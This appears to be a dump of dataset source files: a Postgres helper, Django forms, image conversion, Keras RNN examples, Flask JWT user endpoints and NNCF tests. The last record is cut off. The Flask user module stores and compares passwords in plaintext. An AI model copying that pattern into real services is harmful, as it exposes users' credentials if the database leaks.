{"seq_id":"259796355","text":"import os\nimport psycopg2\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nCONN = None\nTESTING_MODE = False\n# def connect():\n    # global CONN\n\nDATABASE_URL = os.getenv('DATABASE_URL')\ntry:\n    CONN = psycopg2.connect(DATABASE_URL, sslmode='require')\n    print('PostgreSQL connection successful')\nexcept (Exception, psycopg2.DatabaseError) as error:\n    print(error)\n\n\ndef query(sql, args=()):\n    ''' query the database and get back rows selected/modified '''\n    cur = CONN.cursor()\n    try:\n        cur.execute(sql, args)\n    except Exception as e:\n        print(type(e).__name__, e)\n        raise e\n    if cur.description is None:\n        rows = []\n    else:\n        rows = cur.fetchall()\n    if not TESTING_MODE:\n        CONN.commit()\n    cur.close()\n    return rows\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"390960321","text":"from gbe.models import Participant, Class, Show, Act\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ParticipantForm(forms.ModelForm):\n    class Meta:\n        model = Participant\n        fields = ['stage_name', 'phone_number',\n                  'email_address', 'street_address_1', 'street_address_2',\n                  'city', 'state', 'zip_code', 'country',\n                  'is_performer', 'is_worker']\n\n\nclass RegistrationForm(UserCreationForm):\n    '''Form for creating a GBE user. Collects info for the User object as\n    well as for the user's profile (Participant object).\n    '''\n    email = forms.EmailField(required=True)\n\n    class Meta:\n        model = User\n        fields = ['username', 'first_name', 'last_name',\n                  'email', 'password1', 'password2']\n\n    def save(self, commit=True):\n        # Call RegistrationForm's parent chain so UserCreationForm.save()\n        # runs and the password gets hashed before the user is stored.\n        user = super(RegistrationForm, self).save(commit=False)\n        user.email = self.cleaned_data['email']\n        if commit:\n            user.save()\n        return user\n\n\nclass ActForm(forms.ModelForm):\n    class Meta:\n        model = Act\n        fields = ['website', 'promo_image', 'contact', 'act_name',\n                  'performers']\n\n\nclass ClassForm(forms.ModelForm):\n    class Meta:\n        model = Class\n        fields = ['title', 'organizer', 'teacher',\n                  'short_desc', 'long_desc']\n\n\nclass ShowForm(forms.ModelForm):\n    class Meta:\n        model = Show\n        fields = ['title', 'organizer', 'mc', 'acts',\n                  'short_desc', 'long_desc']\n","sub_path":"gbe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"411272403","text":"import os\nimport cv2\nimport numpy as np\nfrom scipy.io import loadmat, savemat\n\n\ndef convert_training_images_to_numpy_array_for_each_class_color(pathname, no_of_images_in_each_class, mat_file_path):\n    directory = os.fsencode(pathname)\n    subdirectories = [dI for dI in os.listdir(directory) if os.path.isdir(os.path.join(directory, dI))]\n    print(subdirectories)\n\n    for directory in subdirectories:\n        per_class_img_matrix = []\n        dir_name = os.fsdecode(directory)\n        print(\"DIR NAME :\" + dir_name)\n        file_no = 1\n        for file in os.listdir(pathname + dir_name):\n            filename = os.fsdecode(file)\n            print(\"FILE NAME :\" + filename)\n            src_file = pathname + dir_name + \"/\" + filename\n            image = cv2.imread(src_file, cv2.IMREAD_COLOR)\n
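            # cv2.imread()'s second argument must be an IMREAD_* flag
            # (cv2.IMREAD_COLOR here); color-conversion codes such as
            # cv2.COLOR_RGB2BGR belong to cv2.cvtColor() instead. imread()
            # also returns None for unreadable files, so a None check here
            # would keep bad entries out of the per-class array.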
            per_class_img_matrix.append(image)\n            if file_no == no_of_images_in_each_class:\n                break\n            file_no += 1\n\n        mat_file_name = dir_name + \".mat\"\n        modi_mat_file_path = mat_file_path + \"/\" + mat_file_name\n        modi_label = dir_name\n\n        conv_img_matrix = np.asarray(per_class_img_matrix)\n        print(np.shape(conv_img_matrix))\n        savemat(modi_mat_file_path, mdict={modi_label: conv_img_matrix})\n\n\ndef read_train_data_for_each_class(dir_path):\n    for file in os.listdir(dir_path):\n        filename = os.fsdecode(file)\n\n        class_name = filename.split('.')[0]\n        print(class_name)\n\n        dataset_path = dir_path + \"/\" + filename\n        data_set = loadmat(dataset_path)\n\n        train_data = data_set[class_name]\n\n        training_no_of_images_in_class = np.shape(train_data)[0]\n        print(np.shape(train_data))\n\n        i = 0\n        while i < training_no_of_images_in_class:\n            cv2.imshow(str(i + 1), train_data[i])\n            cv2.waitKey(0)\n            i += 1\n\n        cv2.destroyAllWindows()\n\n\ndef convert_testing_images_to_numpy_array_color(pathname, mat_file_name, label):\n    directory = os.fsencode(pathname)\n\n    all_classes_img_matrix = []\n    for file in os.listdir(directory):\n        filename = os.fsdecode(file)\n        print(\"FILE NAME :\" + filename)\n        src_file = pathname + \"/\" + filename\n        image = cv2.imread(src_file, cv2.IMREAD_COLOR)\n        all_classes_img_matrix.append(image)\n\n    conv_img_matrix = np.asarray(all_classes_img_matrix)\n    print(np.shape(conv_img_matrix))\n\n    savemat(mat_file_name, mdict={label: conv_img_matrix})\n\n\ndef read_test_data(file_path):\n    data_set = loadmat(file_path)\n\n    test_data = data_set['test']\n\n    no_of_test_images = np.shape(test_data)[0]\n\n    i = 0\n    while i < no_of_test_images:\n        cv2.imshow(str(i + 1), test_data[i])\n        cv2.waitKey(0)\n        i += 1\n\n    cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n    number_of_images_from_each_class = 3000\n    # convert_training_images_to_numpy_array_for_each_class_color(\n    #     'D:/ML_Project/asl-alphabet/asl_alphabet_train/asl_alphabet_train/',\n    #     number_of_images_from_each_class, 'D:/ML_Project/data_mat_files/color/training')\n    # read_train_data_for_each_class('D:/ML_Project/data_mat_files/color/training/')\n\n    # read_train_data_for_each_class('D:/ML_Project/data_mat_files/color/training/')\n\n    # convert_testing_images_to_numpy_array(\"D:/ML_Project/asl-alphabet/asl_alphabet_test/asl_alphabet_test/\",\n    #     'D:/ML_Project/color/testing/testing.mat', 'test')\n    # read_test_data('D:/ML Project/color/testing.mat')\n","sub_path":"conv_images_to_mat_each_class_color.py","file_name":"conv_images_to_mat_each_class_color.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"175962362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan  1 17:33:28 2019\n\n@author: Figo\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, SimpleRNN\n\n########## Use Keras's SimpleRNN layer to compare the output of all time steps vs. the last time step ##########\n\n# Return only the output of the last time step.\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32))\nmodel.summary()\n\n# Return the output of every time step\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.summary()\n\n# Stack several recurrent layers one after another, with all intermediate layers returning full output sequences and only the last layer returning its final output\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32)) # This last layer only returns the last outputs.\n
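# (When stacking recurrent layers, every layer except the last needs
#  return_sequences=True so that it emits its full
#  (batch_size, timesteps, output_features) sequence for the next layer.)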
model.summary()\nprint('###################################################')\n\n############## Apply this model to the IMDB movie-review classification problem ##############\n\n# Output paths\nmodel_dir = 'D:/3_other_code/data/IMDB/model/'\nplt_dir = 'D:/3_other_code/data/IMDB/result_plt/'\n\n# Prepare the IMDB data\nfrom keras.datasets import imdb\nfrom keras.preprocessing import sequence\n\n# Number of words to consider as features\nmax_features = 10000\n# Cut the texts off after this many words (all among the max_features most common words)\nmaxlen = 500\nbatch_size = 32\n\nprint('Loading data...')\n(input_train, y_train), (input_test, y_test) = imdb.load_data(num_words=max_features)\nprint(len(input_train), 'train sequences')\nprint(len(input_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\ninput_train = sequence.pad_sequences(input_train, maxlen=maxlen)\ninput_test = sequence.pad_sequences(input_test, maxlen=maxlen)\nprint('input_train shape:', input_train.shape)\nprint('input_test shape:', input_test.shape)\n\n# Train the model with an Embedding layer and a SimpleRNN layer\nfrom keras.layers import Dense\n\nmodel = Sequential()\n# Input: (batch_size, maxlen); output: (batch_size, maxlen, output_dim)\n# 32 specifies the output dimensionality of the Embedding layer\nmodel.add(Embedding(max_features, 32))\n# Input: (batch_size, timesteps, input_features); output: (batch_size, output_features)\nmodel.add(SimpleRNN(32))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.summary()\n\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(input_train, y_train,\n                    epochs=10,\n                    batch_size=128,\n                    validation_split=0.2)\nmodel.save_weights(model_dir + 'Understanding_RNN_using_SimpleRNN.h5')\n\n# Plot the results\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_SimpleRNN_acc')\n\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_SimpleRNN_loss')\n\nplt.show()\n\n################## Use the LSTM layer in Keras ##################\nprint('#####################################')\n\n# Define and train the LSTM model\nfrom keras.layers import LSTM\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 32))\nmodel.add(LSTM(32))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.summary()\n\nmodel.compile(optimizer='rmsprop',\n              loss='binary_crossentropy',\n              metrics=['acc'])\nhistory = model.fit(input_train, y_train,\n                    epochs=10,\n                    batch_size=128,\n                    validation_split=0.2)\nmodel.save_weights(model_dir + 'Understanding_RNN_using_LSTM.h5')\n\n# Plot acc and loss\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_LSTM_acc')\n\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_LSTM_loss')\n
\nplt.show()","sub_path":"deep_learning_code/deep_learning_2018/6_Understanding_recurrent_neural_networks.py","file_name":"6_Understanding_recurrent_neural_networks.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"651748541","text":"from flask_jwt_extended import (\n    jwt_required,\n    create_access_token,\n    create_refresh_token,\n    get_jwt_identity,\n    jwt_refresh_token_required,\n    get_raw_jwt\n)\nfrom flask_restful import Resource, reqparse\nfrom werkzeug.security import safe_str_cmp\n\nfrom models.user import UserModel\nfrom revoked import REVOKED\n\n_user_parser = reqparse.RequestParser()\n_user_parser.add_argument('username', required=True, type=str, help='This field cannot be blank')\n_user_parser.add_argument('password', required=True, type=str, help='This field cannot be blank')\n\n\nclass UserRegister(Resource):\n    def post(self):\n        data = _user_parser.parse_args()\n\n        if UserModel.find_by_username(data['username']):\n            return {\"message\": \"User already exists.\"}, 400\n\n        UserModel(**data).save_to_db()\n\n        return {\"message\": \"User created successfully.\"}, 201\n\n\nclass User(Resource):\n    @jwt_required\n    def get(self, _id):\n\n        user = UserModel.find_by_id(_id)\n\n        if not user:\n            return {\"message\": \"Cannot find user.\"}, 404\n\n        return user.json(), 200\n\n    @jwt_required\n    def delete(self, _id):\n\n        user = UserModel.find_by_id(_id)\n\n        if not user:\n            return {\"message\": \"Cannot find user.\"}, 404\n\n        user.delete_from_db()\n\n        return {\"message\": \"User deleted.\"}, 200\n\n\nclass UserAuth(Resource):\n    @classmethod\n    def post(cls):\n        data = _user_parser.parse_args()\n\n        user = UserModel.find_by_username(data['username'])\n\n        if user and safe_str_cmp(user.password, data['password']):\n            access_token = create_access_token(identity=user.id, fresh=True)\n            refresh_token = create_refresh_token(user.id)\n            return {\n                \"access_token\": access_token,\n                \"refresh_token\": refresh_token\n            }, 200\n\n        return {\"message\": \"Invalid credentials.\"}, 401\n\n\nclass UserRevoke(Resource):\n    @jwt_required\n    def post(self):\n        jti = get_raw_jwt()['jti']\n        REVOKED.add(jti)\n        return {\n            'message': 'Successfully revoked user token.'\n        }, 200\n\n\nclass TokenRefresh(Resource):\n    @jwt_refresh_token_required\n    def post(self):\n        current_user_id = get_jwt_identity()\n        new_token = create_access_token(identity=current_user_id, fresh=False)\n        return {'access_token': new_token}, 200\n","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"230752627","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('billing', '0021_auto_20160812_1109'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='transaction',\n            name='user_pay',\n            field=models.IntegerField(blank=True, null=True, default=0, verbose_name='Комиссия пользователя'),\n        ),\n    ]\n","sub_path":"billing/migrations/0022_auto_20160921_0330.py","file_name":"0022_auto_20160921_0330.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"327041106","text":"\"\"\"\n Copyright (c) 2019-2020 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the 
\"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport copy\nimport itertools\nimport os\nfrom functools import partial\nfrom functools import reduce\nfrom typing import Dict\nfrom typing import List\n\nimport onnx\nimport pytest\nfrom torch import cuda\nfrom torch import nn\nfrom torch.nn import DataParallel\n\nfrom nncf import NNCFConfig\nfrom nncf.algo_selector import COMPRESSION_ALGORITHMS\nfrom nncf.algo_selector import NoCompressionAlgorithmBuilder\nfrom nncf.api.compression import CompressionLevel\nfrom nncf.checkpoint_loading import load_state\nfrom nncf.compression_method_api import DOMAIN_CUSTOM_OPS_NAME\nfrom nncf.hw_config import HWConfigType\nfrom tests.helpers import BasicConvTestModel\nfrom tests.helpers import create_compressed_model_and_algo_for_test\nfrom tests.helpers import get_empty_config\nfrom tests.quantization.test_quantization_helpers import get_quantization_config_without_range_init\nfrom tests.sparsity.magnitude.test_helpers import get_basic_magnitude_sparsity_config\nfrom tests.sparsity.rb.test_algo import get_basic_sparsity_config\n\n\nclass BasicLinearTestModel(nn.Module):\n def __init__(self, size=4):\n super().__init__()\n self.fc = nn.Linear(size, size)\n\n def forward(self, x):\n return self.fc(x)\n\nclass BasicTestModelWithTwoInputOutput(nn.Module):\n def __init__(self, size=4):\n super().__init__()\n self.fc0 = nn.Linear(size, size)\n self.fc1 = nn.Linear(size, size)\n\n def forward(self, x0, x1):\n return self.fc0(x0), self.fc1(x1)\n\ndef get_const_sparsity_config():\n config = get_empty_config()\n config['compression'] = {'algorithm': 'const_sparsity'}\n return config\n\n\ndef get_basic_asym_quantization_config(model_size=4):\n config = get_quantization_config_without_range_init(model_size)\n config['compression']['activations'] = {\"mode\": \"asymmetric\"}\n config['compression']['initializer']['range'] = {\"num_init_samples\": 0}\n return config\n\n\n@pytest.mark.parametrize('config_provider',\n (get_quantization_config_without_range_init, get_basic_asym_quantization_config,\n get_basic_sparsity_config,\n get_basic_magnitude_sparsity_config, get_const_sparsity_config),\n ids=('SymQuantization', 'AsymQuantization', 'Sparsity', 'MagnitudeSparsity', 'ConstSparsity'))\n@pytest.mark.parametrize('model_provider', (BasicConvTestModel, BasicLinearTestModel),\n ids=('Conv2d', 'Linear'))\nclass TestCompressionAlgos:\n def test_can_export_compressed_model(self, tmp_path, config_provider, model_provider):\n test_path = str(tmp_path.joinpath('test.onnx'))\n model = model_provider()\n config = config_provider()\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path)\n assert os.path.exists(test_path)\n\nclass TestConfigCreator:\n def __init__(self):\n self._config = get_empty_config()\n self._algorithm_sections = {}\n\n def create(self) -> NNCFConfig:\n self._config['compression'] = []\n for algo_name, params in self._algorithm_sections.items():\n algo_section = {'algorithm': algo_name}\n if params:\n algo_section['params'] = params\n 
self._config['compression'].append(algo_section)\n return self._config\n\n def add_algo(self, name: str, params: Dict = None):\n self._algorithm_sections[name] = params\n return self\n\n def __str__(self):\n return '_'.join(self._algorithm_sections)\n\n\nclass CompressionLevelTestStruct:\n def __init__(self, config_provider: 'TestConfigCreator', compression_levels: List[CompressionLevel]):\n self.config_provider = config_provider\n self.compression_levels = compression_levels\n\n def __str__(self):\n return str(self.config_provider)\n\n\nstaged_quantization_params = {'activations_quant_start_epoch': 1, 'weights_quant_start_epoch': 2}\nmagnitude_sparsity_params = {'schedule': 'multistep',\n 'multistep_steps': [1, 2],\n 'multistep_sparsity_levels': [0, 0.3, 0.5]}\nfilter_pruning_params = {'schedule': 'exponential', 'num_init_steps': 0, 'pruning_steps': 3}\nFFF_levels = [CompressionLevel.FULL] * 3\nNPF_levels = [CompressionLevel.NONE, CompressionLevel.PARTIAL, CompressionLevel.FULL]\nLIST_OF_TEST_PARAMS = [\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization'),\n compression_levels=FFF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization', staged_quantization_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('const_sparsity'),\n compression_levels=FFF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('rb_sparsity', {\n 'sparsity_target': 0.61,\n 'sparsity_target_epoch': 2,\n }),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('filter_pruning', {\n 'num_init_steps': 1,\n 'pruning_steps': 2,\n }),\n compression_levels=[CompressionLevel.NONE, CompressionLevel.FULL, CompressionLevel.FULL]\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization'),\n compression_levels=[CompressionLevel.PARTIAL] * 2 + [CompressionLevel.FULL],\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization', staged_quantization_params),\n compression_levels=NPF_levels,\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization', staged_quantization_params).add_algo(\n 'filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels,\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization', staged_quantization_params).add_algo('filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels,\n ),\n]\n\n\n@pytest.mark.parametrize('test_struct', LIST_OF_TEST_PARAMS, ids=[str(param) for param in LIST_OF_TEST_PARAMS])\ndef test_can_get_compression_level(test_struct: CompressionLevelTestStruct):\n config_provider, compression_levels = test_struct.config_provider, test_struct.compression_levels\n model = BasicConvTestModel()\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, 
config_provider.create())\n compression_scheduler = compression_ctrl.scheduler\n assert compression_ctrl.compression_level() == compression_levels[0]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[0]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[1]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[2]\n\n\n@pytest.mark.parametrize(('src', 'dst', 'ref'),\n (\n (CompressionLevel.NONE, CompressionLevel.NONE, CompressionLevel.NONE),\n (CompressionLevel.PARTIAL, CompressionLevel.PARTIAL, CompressionLevel.PARTIAL),\n (CompressionLevel.FULL, CompressionLevel.FULL, CompressionLevel.FULL),\n (CompressionLevel.NONE, CompressionLevel.PARTIAL, CompressionLevel.PARTIAL),\n (CompressionLevel.NONE, CompressionLevel.FULL, CompressionLevel.PARTIAL),\n (CompressionLevel.PARTIAL, CompressionLevel.FULL, CompressionLevel.PARTIAL))\n )\ndef test_combo_of_compression_levels(src, dst, ref):\n assert src + dst == ref\n assert dst + src == ref\n src_c = copy.deepcopy(src)\n src_c += dst\n assert src_c == ref\n dst_c = copy.deepcopy(dst)\n dst_c += src\n assert dst_c == ref\n\n\nQUANTIZATION = 'quantization'\nSPARSITY_TYPES = ['magnitude', 'rb', 'const']\nSPARSITY_ALGOS = ['_'.join([type, 'sparsity']) for type in SPARSITY_TYPES] # 3S\n\nLOAD_ALGOS = list(itertools.product([QUANTIZATION], SPARSITY_ALGOS)) # Q + 3S\nLOAD_ALGOS += itertools.product(SPARSITY_ALGOS, [QUANTIZATION]) # 3S + Q\n\nSAVE_ALGOS = [[algo] for algo in SPARSITY_ALGOS] # 3S\nSAVE_ALGOS += [[QUANTIZATION]] # Q\nSAVE_ALGOS += LOAD_ALGOS # Q , 3S, 3S + Q, Q+3S\n\nALGOS = list(itertools.product(SAVE_ALGOS, LOAD_ALGOS))\n\n\n@pytest.fixture(scope='module', params=ALGOS,\n ids=['__'.join(['save:' + '_'.join(a[0]),\n 'load:' + '_'.join(a[1])]) for a in ALGOS]\n )\ndef _algos(request):\n pair_algos = request.param\n save_algos = pair_algos[0]\n load_algos = pair_algos[1]\n resume_ok = False\n # resume expects the same list of algorithms\n if save_algos == load_algos:\n resume_ok = True\n\n if len(save_algos) == len(load_algos):\n for s, v in zip(save_algos, load_algos):\n if s != v and ('magnitude' in s and 'const' in v or 'const' in s and 'magnitude' in v):\n resume_ok = True\n\n # Priority mechanism ensures that algo permutations are irrelevant\n if set(save_algos) == set(load_algos):\n resume_ok = True\n else:\n saved_sparsity = filter(lambda x: x != QUANTIZATION, save_algos)\n loaded_sparsity = filter(lambda x: x != QUANTIZATION, load_algos)\n\n for s, v in zip(saved_sparsity, loaded_sparsity):\n # resume works fine for magnitude <-> const combo, because they have similar parameters\n if s != v and ('magnitude' in s and 'const' in v or 'const' in s and 'magnitude' in v):\n resume_ok = True\n\n return {\n 'save_algos': save_algos,\n 'load_algos': load_algos,\n 'is_resume_ok': resume_ok\n }\n\n\nMODEL_WRAPPER = [\"CPU\", \"GPU\"]\nWRAPPERS = list(itertools.product(MODEL_WRAPPER, MODEL_WRAPPER))\n\n\n@pytest.fixture(scope='function', params=WRAPPERS,\n ids=['_'.join(['from:' + w[0], 'to:' + w[1]]) for w in WRAPPERS])\ndef _model_wrapper(request):\n modes = request.param\n\n def wrap_model(mode, model):\n if mode == \"GPU\":\n model = DataParallel(model, [0])\n return model\n\n return {\n 'save_model': partial(wrap_model, modes[0]),\n 'resume_model': partial(wrap_model, modes[1]),\n }\n\n\n@pytest.mark.parametrize('is_resume', (True, False), ids=['resume', 'load_weights'])\ndef 
test_load_state_interoperability(_algos, _model_wrapper, is_resume):\n config_save = get_empty_config()\n config_save['compression'] = [{'algorithm': algo} for algo in _algos['save_algos']]\n compressed_model_save, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config_save)\n model_save = _model_wrapper['save_model'](compressed_model_save)\n saved_model_state = model_save.state_dict()\n ref_num_loaded = len(saved_model_state)\n\n config_resume = get_empty_config()\n config_resume['compression'] = [{'algorithm': algo} for algo in _algos['load_algos']]\n compressed_model_resume, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(),\n config_resume)\n model_resume = _model_wrapper['resume_model'](compressed_model_resume)\n\n if not is_resume or (is_resume and _algos['is_resume_ok']):\n act_num_loaded = load_state(model_resume, saved_model_state, is_resume)\n\n if ('magnitude_sparsity' in _algos['load_algos'] or 'const_sparsity' in _algos['load_algos']) \\\n and 'rb_sparsity' in _algos['save_algos']:\n # no need to load _mask and _uniform\n ref_num_loaded -= 2\n assert act_num_loaded == ref_num_loaded\n else:\n with pytest.raises(RuntimeError):\n load_state(model_resume, saved_model_state, is_resume)\n\n\nLIST_ALGOS = [None, QUANTIZATION]\nLIST_ALGOS += SPARSITY_ALGOS # 3S\n\n\n@pytest.mark.parametrize('is_resume', (True, False), ids=['resume', 'load_weights'])\n@pytest.mark.parametrize('algo', tuple(LIST_ALGOS))\ndef test_ordinary_load(algo, _model_wrapper, is_resume):\n config = get_empty_config()\n if algo:\n config['compression'] = {'algorithm': algo}\n\n compressed_model_save, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config)\n model_save = _model_wrapper['save_model'](compressed_model_save)\n\n compressed_model_resume, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config)\n model_resume = _model_wrapper['resume_model'](compressed_model_resume)\n\n num_loaded = load_state(model_resume, model_save.state_dict(), is_resume)\n\n assert num_loaded == len(model_save.state_dict())\n\n\ndef test_can_export_compressed_model_with_input_output_names(tmp_path):\n test_path = str(tmp_path.joinpath('test.onnx'))\n target_input_names = ['input1', 'input2']\n target_output_names = ['output1', 'output2']\n\n model = BasicTestModelWithTwoInputOutput()\n config = get_basic_asym_quantization_config()\n\n config[\"input_info\"] = [{'sample_size': [1, 1, 4, 4]}, {'sample_size': [1, 1, 4, 4]}]\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path, input_names=target_input_names,\n output_names=target_output_names)\n\n assert os.path.exists(test_path)\n\n onnx_model = onnx.load(test_path)\n # pylint: disable=no-member\n curr_input_names = [node.name for node in onnx_model.graph.input]\n curr_output_names = [node.name for node in onnx_model.graph.output]\n\n assert curr_input_names == target_input_names\n assert curr_output_names == target_output_names\n\n\ndef test_can_export_compressed_model_with_specified_domain_for_custom_ops(tmp_path):\n test_path = str(tmp_path.joinpath('test.onnx'))\n\n model = BasicTestModelWithTwoInputOutput()\n config = get_basic_asym_quantization_config()\n\n config[\"input_info\"] = [{'sample_size': [1, 1, 4, 4]}, {'sample_size': [1, 1, 4, 4]}]\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path)\n\n assert os.path.exists(test_path)\n\n onnx_model = 
onnx.load(test_path)\n\n count_custom_ops = 0\n # pylint: disable=no-member\n for op_node in onnx_model.graph.node:\n if op_node.op_type == \"FakeQuantize\":\n assert op_node.domain == DOMAIN_CUSTOM_OPS_NAME\n count_custom_ops += 1\n\n assert count_custom_ops == 4\n\n\ndef change_compression_algorithms_order(config):\n # changes order of compression algorithms in config\n def shift_list(list_for_shift):\n shifted_list = [list_for_shift.pop()] + list_for_shift\n return shifted_list\n\n config_compression = list(config.get('compression', {}))\n shifted_config_compression = shift_list(config_compression)\n config.update({'compression': shifted_config_compression})\n return config\n\n\ndef get_basic_rb_sparsity_int8_config():\n config = get_basic_sparsity_config()\n config.update({\n \"compression\": [\n {\n \"algorithm\": \"rb_sparsity\",\n \"sparsity_init\": 0.02,\n \"params\":\n {\n \"schedule\": \"polynomial\",\n \"sparsity_target\": 0.5,\n \"sparsity_target_epoch\": 2,\n \"sparsity_freeze_epoch\": 3\n },\n },\n {\n \"algorithm\": \"quantization\"\n }\n ]\n }\n )\n return config\n\n\ncomp_loss_configs = [\n get_basic_rb_sparsity_int8_config(),\n change_compression_algorithms_order(get_basic_rb_sparsity_int8_config())\n]\n\n\n@pytest.mark.parametrize(\"config\", comp_loss_configs,\n ids=[reduce(lambda x, y: x + \"_\" + y.get(\"algorithm\", \"\"), config.get('compression', []),\n 'compression')\n for config in comp_loss_configs])\n@pytest.mark.skipif(not cuda.is_available(), reason=\"Since its GPU test, no need to run this without GPUs available\")\ndef test_compression_loss_gpu_device_compatibility(config):\n model = BasicConvTestModel()\n model.to(cuda.current_device())\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n compression_ctrl.loss()\n\n\n@pytest.mark.parametrize('algo_name, target_device',\n list(itertools.product(\n list(COMPRESSION_ALGORITHMS.registry_dict.keys()),\n list([x.value for x in HWConfigType]))))\ndef test_target_device_is_propagated_to_algos(mocker, algo_name, target_device):\n if algo_name == NoCompressionAlgorithmBuilder.__name__:\n pytest.skip()\n model = BasicConvTestModel()\n config = NNCFConfig.from_dict({\n \"input_info\":\n {\n \"sample_size\": [1, 1, 32, 32],\n },\n \"compression\": {\n \"algorithm\": algo_name\n },\n \"target_device\": target_device\n })\n\n import nncf\n compression_builder_init_spy = mocker.spy(nncf.api.compression.CompressionAlgorithmBuilder, '__init__')\n create_compressed_model_and_algo_for_test(model, config)\n assert 